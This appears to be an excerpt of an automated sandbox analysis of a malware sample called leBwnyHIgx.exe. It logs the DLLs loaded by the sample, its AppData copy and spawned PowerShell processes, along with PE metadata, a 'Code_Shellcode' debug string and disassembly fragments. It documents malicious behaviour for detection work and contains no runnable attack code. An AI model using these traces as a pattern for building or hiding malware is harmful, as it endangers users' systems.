Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: dinput8.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: leBwnyHIgx.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: leBwnyHIgx.exe Static file information: File size 2581432 > 1048576
                      Source: leBwnyHIgx.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x258200
                      Source: leBwnyHIgx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 5_2_03077490
                      Source: leBwnyHIgx.exe.0.dr Static PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exe Static PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exe Static PE information: section name: .didata
                      Source: leBwnyHIgx.exe.0.dr Static PE information: section name: .didata
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0063B070 push ecx; mov dword ptr [esp], ecx 0_2_0063B075
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005DE0D8 push ecx; mov dword ptr [esp], ecx 0_2_005DE0DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0047A268 push ecx; mov dword ptr [esp], ecx 0_2_0047A26C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00432368 push ecx; mov dword ptr [esp], edx 0_2_0043236B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00415334 push ss; retf 0_2_004153F8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040D570 push ecx; mov dword ptr [esp], eax 0_2_0040D575
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040E5E0 push 0040E663h; ret 0_2_0040E65B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040A5A0 push ecx; mov dword ptr [esp], edx 0_2_0040A5A1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00479670 push ecx; mov dword ptr [esp], ecx 0_2_00479675
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004216D8 push ecx; mov dword ptr [esp], ecx 0_2_004216DB
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00421714 push ecx; mov dword ptr [esp], ecx 0_2_00421718
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00410734 push ecx; mov dword ptr [esp], edx 0_2_00410735
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004C5794 push ecx; mov dword ptr [esp], edx 0_2_004C5795
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00410868 push ecx; mov dword ptr [esp], ecx 0_2_0041086D
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_004FACA0 push ecx; mov dword ptr [esp], eax 0_2_004FACA3
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0042CE20 push ecx; mov dword ptr [esp], edx 0_2_0042CE22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0047BF34 push ecx; mov dword ptr [esp], edx 0_2_0047BF35
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_100172C7 push eax; ret 0_2_100172C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04A0629D push eax; ret 3_2_04A06351
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0063B070 push ecx; mov dword ptr [esp], ecx 5_2_0063B075
